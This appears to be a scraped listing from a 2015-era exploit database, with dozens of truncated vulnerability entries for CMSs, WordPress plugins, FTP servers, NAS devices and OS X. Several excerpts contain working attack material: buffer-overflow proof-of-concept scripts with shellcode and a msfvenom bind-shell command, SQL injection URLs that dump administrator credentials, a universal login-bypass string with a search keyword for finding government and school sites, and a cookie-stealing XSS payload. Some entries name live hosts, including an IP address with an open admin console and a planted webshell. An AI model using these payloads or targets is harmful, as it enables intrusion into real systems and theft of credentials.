Kingdee system upload vulnerability leads to GETSHELL (server already a webshell farm)
Brief description: WooYun reviewers, please review http://www.wooyun.org/bugs/wooyun-2015-0138341/trace/59330513063ee2e0ce62e5655bd17f0e, it was submitted a while ago..... Thanks!!! Details: An upload vulnerability leads to getshell; the server was found to already be a webshell farm, leaking the usernames and passwords of all users from 2007 to 2015. Proof of vulnerability: The Kingdee online exam system, http://exam.kingdee.com/, has an upload vulnerability leading to getshell. The system's login home page: The vulnerable upload page allows jsp files to be uploaded directly. ...
yuyou hudongpingtai /Components/news/FileDown.aspx Arbitrary File Download
No description provided by source...
Redis Unauthorized Access PoC
Redis is an open-source, network-capable, log-structured key-value database written in ANSI C that can run purely in memory or persist to disk, and it provides APIs for many languages. By default Redis requires no password, so anyone who can reach the port directly can read all data in the database, causing serious information disclosure. ...
Boxoft WAV to MP3 Converter - convert Feature Buffer Overflow
First get the PoC and take a look: an obvious overflow, exploited through the SEH structure. #!/usr/bin/python # using=utf-8 f = open("malicious.aiff", "w") f.write("A"*4132) f.write("\xeb\x06\x90\x90") # nseh f.write("\xa4\x43\x40\x00") # seh # Shellcode: windows/exec - 277 bytes # CMD=calc.exe f.write("\x90"*20) f.write("\xba\xd5\x31\x08\x38\xdb\xcb\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"...
DedeCMS V5.7 SP1 /member/mtypes.php SQL Injection Vulnerability
No description provided by source...
Star-net SVG6000 /cgi-bin/Form_AddPlusUser Safe Mode Bypass
No description provided by source...
WordPress dzs-zoomsounds Plugins 2.0 /admin/upload.php File Upload
No description provided by source...
Kingdee EAS /portal/logoImgServlet Arbitrary File Download
No description provided by source...
Watu PRO 4.8.8.4 - CSRF
Assuming there is a quiz with ID 1, the following link will delete it when visited by a logged-in admin: http://localhost/wp-admin/admin.php?page=watuproexams&action=delete&quiz=1...
WordPress <= 4.2 - Stored XSS
Confirmed vulnerable: WordPress 4.2, 4.1.2, 4.1.1, 3.9.3. Tested with MySQL versions 5.1.53 and 5.5.41. Overview: Current versions of WordPress are vulnerable to a stored XSS. An unauthenticated attacker can inject JavaScript in WordPress comments. The script is triggered when the comment is viewed...
Oracle WebLogic SSRF And XSS
CVE-2014-4210 Server Side Request Forgery in SearchPublicRegistries.jsp. Affected Software: Oracle Fusion Middleware 10.0.2, 10.3.6. Oracle WebLogic web server is often both (a) externally accessible and (b) permitted to invoke connections to internal hosts. The SearchPublicRegistries.jsp page can be...
YesWiki 0.2 /wakka.php Path Traversal Vulnerability
Date: 2015-09-02 Exploit Author: HaHwul Exploit Author Blog: http://www.codeblack.net Vendor Homepage: http://yeswiki.net Software Link: https://github.com/YesWiki/yeswiki Version: yeswiki 0.2 Tested on: Debian Wheezy CVE :...
WordPress LeagueManager Plugins 3.9.11 /lib/core.php SQL Injection
No description provided by source...
ProFTPd 1.3.5 File Copy
No description provided by source...
Photoshop CC2014 and Bridge CC 2014 PDF Parsing Memory Corruption Vulnerabilities
EDB-ID: 37349 Author: Francis Provencher Published: 2015-06-23 Introduction =============== Adobe Photoshop is a raster graphics editor developed for Windows and OS...
WordPress CP Multi View Event Calendar Plugin 1.1.7 - SQL Injection
Exploit Title: WordPress cp-multi-view-calendar.1.1.7 Unauthenticated SQL injection vulnerabilities Date: 2015-07-10 Google Dork: Index of /wordpress/wp-content/plugins/cp-multi-view-calendar Vendor Homepage: http://wordpress.dwbooster.com/ Software Link:...
Discuz 3.2 /static/js/bbcode.js Cross-Site Scripting Vulnerability
No description provided by source...
v5shop SQL commond.aspx SQL Injection Vulnerability
Brief description: The V5Shop online store system is a B2C shop-building software product from Shanghai Weibo, aimed at small and medium enterprises and individuals who want to build a personalized online store quickly. V5shop 8.2 has a universal and very serious SQL injection vulnerability that directly exposes the administrator account and password, and the backend upload does no filtering either. Exploit: /commond.aspx?id=1 and 1=(select top 1 name from webadmin) displays the administrator username directly. /commond.aspx?id=1 and 1=(select top 1 pass from webadmin) displays the MD5 password. Default backend address: /weblogin/Login.aspx...
Apple MAC OS X < 10.9/10 - Local Root Exploit
/* osx-irony-assist.m Copyright (c) 2010 by [email protected] Apple MACOS X 10.9/10? local root exploit by mu-b - June 2010 - Tested on: Apple MACOS X = 10.8.X $Id: osx-irony-assist.m 16 2015-04-10 09:34:47Z mu-b $ The most ironic backdoor perhaps in the history of backdoors. Enabling 'Assistive...
Seagate Business NAS 2014.00319 system/libraries/Session.php Code Execution
No description provided by source...
DaHanCMS 2014 VerifyCodeServlet Login Bypass Vulnerability
No description provided by source...
Seagate Business NAS <= 2014.00319 - Pre-Authentication Remote Code Execution
No description provided by source...
Yonyou system: direct login to WebSphere leads to Getshell
Brief description: The WebSphere administration console can be entered directly to getshell. Details: http://211.144.131.98/ Vulnerable address: https://211.144.131.98:9043/ibm/console/ No admin password is set, so the backend can be entered and a shell obtained directly. Enter admin to reach the backend. Following yuanzhang's article http://drops.wooyun.org/tips/604, getshell from the backend. Trojan address: http://211.144.131.98:9080/safetest/index.jsp Upload a Chopper (caidao) shell, address...
nginx 0.5.6 - 1.7.4 SSL Session Vulnerability
No description provided by source...
Hikvision Web Weak Password
No description provided by source...
0375 Pingdingshan Site-Building System SQL Injection Vulnerability
Search keyword: 技术支持:0375网 Default backend account: admin. Universal password: 'or'='or'. Affected sites include many government, school and enterprise sites. There are several other locations: http://example.com/class.asp?classid=xx...
OS X 10.10 - DYLD_PRINT_TO_FILE Local Privilege Escalation
DYLD_PRINT_TO_FILE local privilege escalation vulnerability in OS X 10.10 - 10.10.4 #!/bin/sh # Simple Proof of Concept Exploit for the DYLD_PRINT_TO_FILE local privilege escalation vulnerability in OS X 10.10 - 10.10.4 # (C) Copyright 2015 Stefan Esser # Wait months for a fix from Apple or install the followin...
PHP News Script 4.0.0 - SQL Injection
Exploit Title: PHP News Script 4.0.0 Sql Injection Date: 2015-08-01 Version: 4.0.0 Tested on: CentOS Exploit: http://server/allgallery.php?id=-9999%27+sql-command+%23 Test: http://server/demo/allgallery.php?id=-100%27+union+select+user%23 #!/usr/bin/env python # coding: utf-8 from pocsuite.net import...
SiteFactory CMS 5.5.9 Arbitrary File Download Vulnerability
Vulnerability details: SiteFactory CMS 5.5.9 has an arbitrary file download vulnerability. Problem link: sitefactory/assets/download.aspx?file= Test link: /sitefactory/assets/download.aspx?file=c%3a\windows\win.ini Affected version: SiteFactory CMS 5.5.9...
TurboCRM /pub/bgtaskreq.php SQL Injection
No description provided by source...
GeniXCMS 0.0.3 - XSS Vulnerabilities
Title: Persistent XSS Vendor homepage: genixcms.org Software link: genixcms.org Version: 0.0.3 Tested on: Windows 7 Category: Web application Vendor: ============================================= genixcms.org Product: ===================================================== GeniXCMS v0.0.3 is a PHP-based content management system Advisory information: =================================================== Multiple persistent & reflected...
QiboCMS /member/special.php SQL Injection
No description provided by source...
XerCMS 20150528 /XerCMS/Modules/member/index.php SQL Injection
No description provided by source...
Hewlett-Packard UCMDB - JMX-Console Authentication Bypass
CVE-ID: CVE-2014-7883. Affected versions: UCMDB 10.10 (other versions might also be affected). The HP Universal CMDB (UCMDB) automatically collects and manages accurate and current business service definitions, associated infrastructure relationships and detailed information on the assets, and is a centra...
Hikvision Telnet Weak Password
No description provided by source...
Yahoo! Messenger 11.5.0.228 Buffer Overflow
ADVISORY INFORMATION ----------------------- Product: Yahoo! Messenger Vendor URL: www.yahoo.com Type: Stack-based Buffer Overflow (CWE-121) Date found: 2014-05-02 Date published: 2015-09-03 CVSSv3 Score: 4.8 (AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L) CVE: CVE-2014-7216 VERSIONS AFFECTED -------------------- Yahoo!...
WordPress WP Symposium Plugin SQL Injection Vulnerability
WordPress is a PHP-based blogging platform from the WordPress Software Foundation that lets users host personal blog sites on servers running PHP and MySQL. WP Symposium is a social networking plugin for it. WordPress WP Symposium plugin versions before 15.8 have a SQL injection vulnerability, caused by the getalbumitem.php script insufficiently filtering the 'size' parameter. A remote attacker can exploit this vulnerability to execute arbitrary SQL commands. CNNVD ID: CNNVD-201508-432 CVE ID: CVE-2015-6522...
WordPress Responsive Thumbnail Slider Plugin 1.0 - Arbitrary File Upload
WordPress plugin Responsive Thumbnail Slider Plugin 1.0, arbitrary file upload. This vulnerability is very serious and affects many WordPress themes. The arbitrary file upload requires no interaction with an administrator, no administrator privileges, and not even an ordinary user's account credentials to complete the attack. For exploiting this vulnerability: go to the Add Image section and upload a file via the plugin's own uploader, then upload a file with a double extension, image and B...
Enorth Webpublisher CMS SQL Injection from delete_pending_news.jsp
Title: CVE-2015-5617 Enorth Webpublisher CMS SQL Injection from delete_pending_news.jsp (cbNewsid). Vendor: http://products.enorth.com.cn/bfnrglxt/index.shtml Enorth Webpublisher CMS so far has a scale of tens of thousands of web sites, with the government, enterprises, scientific research and education a...
Filezilla Client 2.2.X - SEH Buffer Overflow Exploit
No description provided by source. #!/usr/bin/env python2 # coding: utf-8 import os, socket, threading, time import traceback # visit: ly0n.me # greetz: NBS # MSGBOX "BrokenByte" msgbox = ("\x68\x6e\x33\x72\x00\x68\x75\x74" "\x69\x30\x68\x5e\x58\x65\x63\x89" "\xe3\x68\x20\x20\x20\x00\x68\x68"...
Bedita 3.5.1 - XSS Vulnerabilities
No description provided by source. Title: Bedita 3.5.1 XSS vulnerabilities Application: Bedita Version: 3.5.1 Software Link: http://www.bedita.com/ Date: 2015-03-09 Author: Sébastien Morin Contact: https://twitter.com/SebMorin1 Category: Web Applications =================== Introduction:...
Cyberoam - Blind SQL Injection
Description: The username field in the captive portal of the Cyberoam NG firewall is vulnerable to SQL injection and can be exploited to execute SQL commands on the database. The username field is vulnerable to the following types of SQL injection: (a) Boolean-based blind SQL injection, (b) Stacked...
PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow
No description provided by source. #!/usr/bin/python import socket import sys # msfvenom -p windows/shell_bind_tcp lhost=192.168.1.130 lport=4444 -b '\x00\x0a\x0b\x27\x36\xce\xc1\x04\x14\x3a\x44\xe0\x42\xa9\x0d' -f ruby # Payload size: 352 bytes shellcode =...
Yiqicms Stored XSS
The message board in the latest yiqicms 1.9 has the same problem as version 1.8. In the comment area, the title is only restricted to a length of 30 characters, and no other ... is applied. if(!preg_match("/^.{1,30}$/", $msgtitle)) { ShowMsg("请输入正确的标题"); exit; } if(!preg_match("/^.{1,10}$/", $msgname)) { ShowMsg("请输入您的姓名"); exit; } if(!preg_match("/^.{1,20}$/", $msgcontact)) { ShowMsg("请输入正确的联系方式"); exit; } if(!preg_match("/^.{1,200}$/", $msgcontent...
Qibo Classified System Remote Code Execution Vulnerability
Affected version: Classified 1.0. Lines 7-16 of the file /do/jf.php contain a potential code execution vulnerability. $query = $db->query("SELECT * FROM $prejfsort ORDER BY list"); while($rs = $db->fetch_array($query)) { $fnameDB[$rs[fid]] = $rs[name]; $query2 = $db->query("SELECT * FROM $prejfabout WHERE fid='$rs[fid]' ORDER BY list"); while($rs2 = $db->fetch_array($query2)) { eval("\$rs2[title]=\"$rs2[title]\";"); ...
MS SQL Server 2000/2005 SQLNS.SQLNamespace COM Object Refresh() Unhandled Pointer Exploit
No description provided by source. <% Function Padding(intLen) Dim strRet, intSize intSize = intLen/2 - 1 For I = 0 To intSize Step 1 strRet = strRet & unescape("%u4141") Next Padding = strRet End Function Function PackDWORD(strPoint) strTmp = replace(strPoint, "0x", "") PackDWORD = PackDWORD & UnEscape("%...
PhpWiki 1.5.4 Cross Site Scripting / Local File Inclusion
1/ Cross-site scripting vulnerability: the cross-site scripting vulnerability allows an unauthenticated remote user to inject arbitrary web script code via GET or POST parameters. Example url: http://192.168.0.10/phpwiki/index.php?pagename=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C!-- Example request: POST /phpwiki/index.php/UserPreferences HTTP/1.1 Host: 192.168.0.10 User-Agent: Mozilla/5.0...
FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution
No description provided by source. #!/usr/bin/python # FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution # Author: Naser Farhadi # Date: 26 August 2015 # Version: 2.1.2 # Tested on: Windows 7 SP1 32 bit # Link: http://sourceforge.net/projects/fhfs/ # Description: FHFS is an FTP and HTTP web server...
Opera 31.0.1889.174 XSS Filter Bypass
Full Explanation: The Opera browser is a famous browser on the internet, and for this reason the Opera company should secure the browser for its users. One of these security issues is the Anti-XSS. The Anti-XSS stops JavaScript from executing, and today I'm going to bypass it. First, make a vulnerable PHP file, e.g.:...
HUAWEI MobiConnect 23.9.17.216 - Privilege Escalation
A local privilege escalation vulnerability has been discovered in the official HUAWEI MobiConnect 23.009.17.00.216 software. The local security vulnerability allows an attacker to gain higher access privileges by executing arbitrary code in connection with DLL hijacking. The security risk of...